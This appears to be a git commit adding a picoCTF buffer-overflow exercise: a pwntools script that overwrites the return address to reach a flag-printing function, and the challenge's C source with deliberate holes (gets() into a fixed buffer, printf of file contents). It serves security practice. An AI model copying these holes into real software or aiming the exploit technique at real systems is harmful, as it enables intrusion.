some more playlist stuff
This commit is contained in:
11
mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
Executable file
11
mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
Executable file
@@ -0,0 +1,11 @@
|
||||
#!/home/maxime/.pyvenv/bin/python3
|
||||
from pwn import *
|
||||
|
||||
conn = remote("saturn.picoctf.net", 63154)
|
||||
|
||||
conn.recvline()
|
||||
conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
|
||||
conn.interactive()
|
||||
|
||||
conn.close()
|
||||
|
||||
BIN
mochis_tale/binary_exploitation/buffer_overflow_1/vuln
Executable file
BIN
mochis_tale/binary_exploitation/buffer_overflow_1/vuln
Executable file
Binary file not shown.
42
mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c
Executable file
42
mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c
Executable file
@@ -0,0 +1,42 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
#include "asm.h"
|
||||
|
||||
#define BUFSIZE 32
|
||||
#define FLAGSIZE 64
|
||||
|
||||
void win() {
|
||||
char buf[FLAGSIZE];
|
||||
FILE *f = fopen("flag.txt","r");
|
||||
if (f == NULL) {
|
||||
printf("%s %s", "Please create 'flag.txt' in this directory with your",
|
||||
"own debugging flag.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fgets(buf,FLAGSIZE,f);
|
||||
printf(buf);
|
||||
}
|
||||
|
||||
void vuln(){
|
||||
char buf[BUFSIZE];
|
||||
gets(buf);
|
||||
|
||||
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
|
||||
}
|
||||
|
||||
int main(int argc, char **argv){
|
||||
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
|
||||
gid_t gid = getegid();
|
||||
setresgid(gid, gid, gid);
|
||||
|
||||
puts("Please enter your string: ");
|
||||
vuln();
|
||||
return 0;
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user